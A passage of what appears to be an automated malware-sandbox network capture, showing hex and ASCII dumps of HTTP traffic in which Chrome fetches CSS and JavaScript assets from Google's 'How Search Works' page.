                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          140192.168.2.750103142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1364OUTGET /search/howsearchworks/assets/MDzy0XxA.css HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 24269
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 29 May 2024 21:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC537INData Raw: 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 3e 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 20 68 31 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 20 44 69 73 70 6c 61 79 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 3b 6c 69 6e 65 2d 68 65
                                                                                                                                                                                                                                                                                          Data Ascii: ._markdown_1q5js_1>:first-child{margin-top:0}._markdown_1q5js_1>:last-child{margin-bottom:0}._markdown_1q5js_1 h1{font-family:Google Sans Display,Roboto,Noto,sans-serif;font-weight:500}@media (max-width: 767px){._markdown_1q5js_1 h1{font-size:28px;line-he
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 20 44 69 73 70 6c 61 79 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 36 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70
                                                                                                                                                                                                                                                                                          Data Ascii: {font-family:Google Sans Display,Roboto,Noto,sans-serif;font-weight:400}@media (max-width: 767px){._markdown_1q5js_1 h2{font-size:28px;line-height:36px}}@media (min-width: 768px) and (max-width: 1023px){._markdown_1q5js_1 h2{font-size:40px;line-height:48p
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 2e 33 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 2c 20 23 31 61 37 33 65 38 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 2c 20 23 31 61 37 33 65 38 29 7d 2e 5f 6d 61 72 6b 64 6f 77 6e 5f 31 71 35 6a 73 5f 31 20 62 6c 6f 63 6b 71 75 6f 74 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a
                                                                                                                                                                                                                                                                                          Data Ascii: .3s ease-in-out}._markdown_1q5js_1 a:hover{color:var(--link-color-hover, #1a73e8);border-bottom:1px solid var(--link-color-hover, #1a73e8)}._markdown_1q5js_1 blockquote{font-family:Google Sans,Roboto,Noto,sans-serif;font-weight:400;text-align:left;margin:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 7d 2e 5f 73 69 7a 65 5c 3a 68 65 61 64 6c 69 6e 65 31 5f 31 75 66 64 72 5f 38 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 20 44 69 73 70 6c 61 79 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 5f 73 69 7a 65 5c 3a 68 65 61 64 6c 69 6e 65 31 5f 31 75 66 64 72 5f 38 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 35 70 78 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2d 2e 35 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e
                                                                                                                                                                                                                                                                                          Data Ascii: }._size\:headline1_1ufdr_8{font-family:Google Sans Display,Roboto,Noto,sans-serif;font-weight:500}@media (max-width: 767px){._size\:headline1_1ufdr_8{font-size:28px;line-height:35px;letter-spacing:-.5px}}@media (min-width: 768px) and (max-width: 1023px){.
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 37 36 37 70 78 29 7b 2e 5f 73 69 7a 65 5c 3a 68 65 61 64 6c 69 6e 65 34 5f 31 75 66 64 72 5f 38 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 73 69 7a 65 5c 3a 68 65 61 64 6c 69 6e 65 34 5f 31 75 66 64 72 5f 38 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 29 7b 2e 5f 73 69 7a 65 5c 3a 68 65 61 64 6c 69 6e 65 34 5f 31 75 66 64 72 5f 38 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67
                                                                                                                                                                                                                                                                                          Data Ascii: 767px){._size\:headline4_1ufdr_81{font-size:20px;line-height:28px}}@media (min-width: 768px) and (max-width: 1023px){._size\:headline4_1ufdr_81{font-size:24px;line-height:32px}}@media (min-width: 1024px){._size\:headline4_1ufdr_81{font-size:28px;line-heig
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 72 5f 31 36 30 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 7d 2e 5f 73 69 7a 65 5c 3a 70 69 6c 6c 2d 6c 61 62 65 6c 5f 31 75 66 64 72 5f 31 36 37 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 63 6f 6c 6f 72 3a 23 39 61 61 30 61 36 7d 2e 5f
                                                                                                                                                                                                                                                                                          Data Ascii: r_160{font-family:Google Sans,Roboto,Noto,sans-serif;font-size:16px;line-height:24px;font-weight:500;color:#202124}._size\:pill-label_1ufdr_167{font-family:Google Sans,Roboto,Noto,sans-serif;font-size:14px;line-height:20px;font-weight:500;color:#9aa0a6}._
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 69 74 6c 65 5f 31 75 66 64 72 5f 32 30 37 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 52 6f 62 6f 74 6f 2c 4e 6f 74 6f 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 7d 7d 40 6c 61 79 65 72 20 63 6f 6d 70 6f 6e 65 6e 74 7b 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 34 69 74 32 39 5f 32 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 76 61 72 28 2d 2d 68 73 77 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 70 61 64 64 69 6e 67 29 3b 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a
                                                                                                                                                                                                                                                                                          Data Ascii: itle_1ufdr_207{font-family:Google Sans,Roboto,Noto,sans-serif;font-size:20px;line-height:28px;font-weight:400}}}@layer component{._container_4it29_2{margin:0 auto;box-sizing:border-box;padding-inline-start:var(--hsw-horizontal-padding);padding-inline-end:
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 61 72 28 2d 2d 68 73 77 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 70 61 64 64 69 6e 67 29 20 2b 20 76 61 72 28 2d 2d 70 61 64 64 69 6e 67 29 29 3b 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 63 61 6c 63 28 76 61 72 28 2d 2d 68 73 77 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 70 61 64 64 69 6e 67 29 20 2b 20 76 61 72 28 2d 2d 70 61 64 64 69 6e 67 29 29 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 63 6f 6e 74 61 69 6e 65 72 5c 3a 69 6e 73 65 74 32 5f 34 69 74 32 39 5f 33 32 7b 2d 2d 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 68 73 77 2d 67 72 69 64 2d 63
                                                                                                                                                                                                                                                                                          Data Ascii: ar(--hsw-horizontal-padding) + var(--padding));padding-inline-end:calc(var(--hsw-horizontal-padding) + var(--padding));width:100%;margin:0 auto}@media (min-width: 768px) and (max-width: 1023px){._container\:inset2_4it29_32{--padding: calc(var(--hsw-grid-c
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 73 73 42 75 74 74 6f 6e 5f 31 68 32 39 78 5f 31 35 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 33 34 70 78 3b 72 69 67 68 74 3a 32 30 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 33 70 78 29 7b 2e 5f 64 69 73 6d 69 73 73 42 75 74 74 6f 6e 5f 31 68 32 39 78 5f 31 35 7b 72 69 67 68 74 3a 31 32 70 78 7d 7d 7d 40 6c 61 79 65 72 20 63 6f 6d 70 6f 6e 65 6e 74 7b 2e 5f 63 6f 6e 74 61 69 6e 65 72 5f 31 6f 38 76 30 5f 32 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 67 61 70 3a 76 61 72 28 2d 2d 68 73 77 2d 67 72 6f 75 70 2d 67 61 70 2c 20 30 29 3b 72 6f 77 2d 67 61 70 3a 76 61 72 28 2d 2d 68 73 77 2d 67 72 6f 75 70 2d 72 6f 77 47 61
                                                                                                                                                                                                                                                                                          Data Ascii: ssButton_1h29x_15{position:absolute;top:34px;right:20px;transform:translateY(-50%)}@media (max-width: 1023px){._dismissButton_1h29x_15{right:12px}}}@layer component{._container_1o8v0_2{display:flex;gap:var(--hsw-group-gap, 0);row-gap:var(--hsw-group-rowGa
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 23 64 61 64 63 65 30 7d 2e 5f 66 6f 6f 74 6e 6f 74 65 73 5f 74 6b 66 31 6b 5f 32 39 2c 2e 5f 66 6f 6f 74 6e 6f 74 65 5f 74 6b 66 31 6b 5f 32 39 7b 63 6f 6c 6f 72 3a 23 35 66 36 33 36 38 7d 2e 5f 66 6f 6f 74 6e 6f 74 65 73 5f 74 6b 66 31 6b 5f 32 39 20 6c 69 3a 3a 6d 61 72 6b 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 32 70 78 7d 2e 5f 6c 69 6e 6b 73 5f 74 6b 66 31 6b 5f 34 35 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 32 70 78 7d 2e 5f 6e 61 76 4c 69 6e 6b 5f 74 6b 66 31 6b 5f 34 39 7b 63 6f 6c 6f 72 3a 23 35 66 36 33 36 38 21 69 6d 70 6f 72
                                                                                                                                                                                                                                                                                          Data Ascii: #dadce0}._footnotes_tkf1k_29,._footnote_tkf1k_29{color:#5f6368}._footnotes_tkf1k_29 li::marker{font-size:12px;line-height:20px;font-weight:500;letter-spacing:.2px}._links_tkf1k_45{padding-top:40px;padding-bottom:42px}._navLink_tkf1k_49{color:#5f6368!impor


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          141192.168.2.750104142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1382OUTGET /search/howsearchworks/assets/vjYgswK-.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1576
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:22 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 08 Mar 2024 16:00:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
